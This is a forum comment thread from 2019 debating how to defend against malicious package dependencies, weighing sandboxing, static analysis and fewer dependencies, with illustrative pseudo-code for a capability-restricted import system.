This is why I don't think this is an OS problem. I think it's a developer mindse...

danShumway · on Dec 4, 2019

I strongly disagree that this isn't an OS problem.

s/dependency/application/g in your comment. Dependencies are just applications that are controlled through code rather than via a mouse/keyboard. They're not special.

I run a minimal Arch setup at home for my development machine, partially for security/reliability reasons -- less software means fewer chances for something to go wrong. But this is a band-aide fix. A minimal Arch setup that forgoes modern niceties like a graphical file browser is not a general-purpose solution to software security.

When someone comes to me and says that an app is stealing their iOS contacts behind their back, my response isn't, "well, its your own fault for installing apps in the first place. Apps are bad." My response is to say that iOS apps shouldn't have access to contacts without explicit permission.

The same is true of language dependencies. Both users and developers need the ability to run untrusted code. The emphasis on "try your hardest not to install anything" is (very temporarily) good advice, but it's ultimately counterproductive and harmful if it distracts us from solving the root issues.

marcus_holmes · on Dec 4, 2019

I actually agree with you.

But until we can provide a form of static analysis that can tell you whether a dependency is malicious or not, we're stuck either manually auditing them, or not using them.

There's very little to choose between a user coming to you saying "I ran a bad application" and "I ran a bad application and clicked on the allow button because I had no way of knowing it was a bad application and I have to allow all applications". Users are notorious for defeating access permissions. Implementing this same bad solution on developers isn't going to work.

sectiondetail · on Dec 4, 2019

At the risk of sounding like someone who wants to spark a language fight (which I genuinely don't) this is why I love Go. The standard library is so good that I rarely need to bring in any third-party dependencies, and the few I do use are extremely well-known with many eyes on their code.

arminiusreturns · on Dec 4, 2019

I've heard more and more sysadmin's liking go for this reason.

marcus_holmes · on Dec 4, 2019

same. Go's attitude to dependencies and standard libraries helped convince me that this is such a problem elsewhere.

greggman2 · on Dec 4, 2019

That sounds like a boil the ocean solution. We're never going to get all developers to be perfect, and besides there are evil devs as well so the solution has to be elsewhere.

marcus_holmes · on Dec 4, 2019

Well, where, exactly?

The solution most people seem to be talking about is sandboxing imports off into containers (sandboxes, whatever - these will end up as containers) so that they can have their access to sensitive data and API's controlled. These aren't "code dependencies" any more, these are "runtime services". It implicitly conforms to "dependencies are bad" by forcing all dependencies to be external services. But it doesn't allow you to actually import known-good dependencies from trusted sources.

And specifically granting access permissions to code has always worked before, right? I mean, people never just click "allow" all the time so they're not bothered by security dialogs, do they? Why are we talking about implementing such a proven-bad solution yet again?

danShumway · on Dec 4, 2019

> And specifically granting access permissions to code has always worked before, right? I mean, people never just click "allow" all the time so they're not bothered by security dialogs, do they? Why are we talking about implementing such a proven-bad solution yet again?

To be clear, is your argument that it's too hard for us to teach people to avoid granting unnecessary permissions, but not too hard for us to teach users not to install any software in the first place?

Educating users about permissions is hard, convincing users not to download anything is impossible.

marcus_holmes · on Dec 4, 2019

My argument is that user behaviour proves that this solution isn't actually a solution. It shifts the blame, but it doesn't solve the problem.

Developers will just allow the bad code access to the things it says it needs, because it says it needs them. Meanwhile we have another sandbox layer to deal with, which isn't good.

We need to reduce the proliferation of dependencies, and only use them for important things, to reduce the attack surface. And we need to tighten up the package managers so typosquatting and duplication of interfaces is flagged (if not banned), and we need some kind of static analysis that flags what capabilities a library uses. And I'm sure there's lots more ways of solving it that I can't think of here.

danShumway · on Dec 5, 2019

> We need to reduce the proliferation of dependencies, and only use them for important things

What you're proposing here is infinitely harder than teaching users to be responsible with permissions. If you can't teach a developer not to grant code access to everything it asks for, you are not going to be able to teach them to install fewer dependencies. It just won't happen, it's completely unrealistic.

A lot of the solutions you're proposing have significant downsides, or they don't scale. Static analysis is great, but doesn't work in highly dynamic languages like Python, Javascript, and Lisp. It also can't handle ambiguously malicious behavior, like device fingerprinting. Static analysis is just a worse version of sandboxing with more holes and more guesswork. Manual reviews don't scale at all -- they're even more unrealistic of a solution than trusting developers to be frugal about the code they install. Tightening package names is nice, but again, not a silver bullet. Sometimes official libraries with official names go bad as well. We have a lot of solutions like this that we can observe in the wild, and they don't really work very well. Google Play still has malware, even though Google says they review apps and remove fraudulent submissions.

On the other hand, we actually have pretty good evidence that sandboxing at least helps -- namely, iOS and the web. Sandboxing isn't perfect, it's a very complicated UX/UI problem that I consider still somewhat unsolved. But, iOS is making decent progress here. Their recent permission reminder system periodically asks users if they want to continue granting permissions to an app -- that's really smart design. The web has also been making excellent progress for a long time. The web has a lot of flaws, but it is a gold standard for user-accessible sandboxing. Nobody thinks twice about clicking on a random link in Twitter, because they don't have to. There's obviously still a lot that needs to improve, but if the primary concern we had about malicious packages on PyPi was that they might mine bitcoin in the background, that would be a very large improvement over stealing SSH keys.

The reason sandboxing is so good is specifically because it shifts blame. Shifting blame is great. With the current situation, I need to audit the code and do research for every single app I install on my PC -- I have to decide whether the author is trustworthy. If the author isn't trustworthy, there's nothing I can do other than avoid their app entirely. This is complicated because trust isn't binary. So I can't just separate authors into "good" and "bad" categories, I have to grade them on a curve.

I do this. It's exhausting. A system where I manage permissions instead of granting each codebase a binary "trusted" label would be a massive improvement to my life, and it's crazy to me that people are in effect saying that we should keep dependencies terrible and exhausting for everyone just because the solution won't help users who are already going to ignore safeguards and install malware anyway.

Imagine if when multiuser systems were first proposed for Unix, somebody said, "yeah, but everyone's just going to grant sudo willy-nilly or share passwords, so why even separate accounts? Instead, we should encourage network admins to minimize the number of people with access to a remote system to just one or two." The current NodeJS sandboxing proposals would mean that when I import a library, I can globally restrict its permissions and its dependencies' permissions in something like 3 lines of code -- the whole thing is completely under my control. The alternative is I spend hours trying to figure out if it's safe to import. How is that better?

marcus_holmes · on Dec 5, 2019

Because a dependency isn't a service. You're talking about dependencies as if they're standalone services that you consume. I think that's probably the predominant attitude at the moment, so sandboxing dependencies to turn them into (effectively) standalone services that you consume might work.

But I don't use dependencies like that. I'm mostly just importing useful functions from a library. Having to sandbox that function away from the rest of my code is not going to work. I'll end up copy/pasting the code into my project to avoid that.

danShumway · on Dec 5, 2019

When we talk about sandboxing dependencies, we're talking about sandboxing at an API level, not an OS level -- in some languages (particularly memory-unsafe languages) that's difficult, but in general the intention isn't to put dependencies in a separate process; it's to restrict access to dangerous APIs like network requests.

Sandboxing might be something like, "I'm importing a function, and I'm going to define a scope, and within that scope, it will have access to these methods, and nothing else." Imagine the following pseudo-code in a fictional, statically typed, rigid langauge.

  import std from 'std';
  import disk from 'io';
  import request from 'http';

  //This dependency (and its sub-dependencies) can
  //only call methods in the std library, nothing else.
  //I can call special_sort anywhere I want and I *know*
  //it can't make network requests or access the disk.
  //All it can do is call a few core std libraries.
  import (std){ special_sort } from 'shady_special_sort';

  function save (data) {
    disk.write('output.log', data);
  }

  function safe_save (data) {
    if (!valid(data)) { return false; }
    save(data);
  }

  function main () {
    //An on-the-fly sandbox -- access to safe_save and request.
    (request, safe_save){
      save('my_malware_payload'); //compile-time error
      disk.write('output.log', 'my_malware_payload'); //compile-time error
      safe_save('my_malware_payload'); //allowed
    }
  }

We're not treating our dependencies or even our inline code as a service here -- we're not loading the code into a separate process or forcing ourselves to go through a connector to call into the API. We're just defining a static constraint that will stop our program from compiling if the code tries to do something we don't want, it's no different than a type-check.

The difference between this and pure static analysis is that static analysis isn't something that's built into the language, and static analysis tries to guess intent. Static analysis says, "that looks shifty, let's alert someone." An language-level sandbox says, "I don't care about the intent, you have access to X and that's it."

Even in a dynamic language like JS, when people talk about stuff like the Realms proposal[0][1], they're talking about a system that's a lot closer to the above than they are about creating standalone services that would live in their own processes or threads.

This kind of style of thinking about security lends itself particularly well to functional languages and functional coding styles, but there's no reason it can't also work with more traditional class-based approaches as well -- you just have to be more careful about what you're passing around and what has access to what objects.

  class Dangerous () {
    unsafe_write (data) {
       //unvalidated disk access
    }
  }

  class Safe () {
    public Dangerous ref = new Dangerous();
    safe_write (data) {
       validate(data);
       ref.unsafe_write();
    }
  }

  function main () {
    Dangerous instance = new Dangerous();

    (instance){
      //I've just accidentally given my sandbox
      //access to `unsafe_write` because I left
      //a property public.
    }
  }

Even with that concern, worrying about my own references is still way, way easier than worrying about an entire, separate codebase that I can't control.

[0]: https://github.com/tc39/proposal-realms

[1]: https://gist.github.com/dherman/7568885

bonoboTP · on Dec 4, 2019

Ideally, though, we wouldn't have to all reimplement the wheel the n+1th time every time. The great power of software is that something can be written once and used over and over again, unlike the way each building needs to be built from the ground, each dinner has to be cooked from the ingredients every day etc.

To give up this kind of modularity and relying on other software engineers' work would throw the baby out with the bathwater.

Sure you need to apply judgement about whether a library seems legit, but the other end of the spectrum is the not-invented-here attitude, which is also bad.

daemin · on Dec 5, 2019

The other question to ask yourself is if you want the dependency as a visible external thing, or do you want it cut & pasted into your code?

Just saying that "Dependencies are bad" means people are more likely to cut and paste that algorithm or bit of code into your application rather than taking it from some sort of package. In this sense you also do not know that it is a dependency, and you do not get any updates or bug fixes for it either.

Have to be careful about those unintended consequences there.

staticassertion · on Dec 4, 2019

Dependencies are great. Critical infrastructure with little to no security engineering effort is the problem.

cjohansson · on Dec 4, 2019

I agree with you, we need developers that take resposibility for their publications, review and test their codebase and all it’s dependencies, proper identification of ”real” published code (integrity check) and also the opt-in to place trust in different maintainers.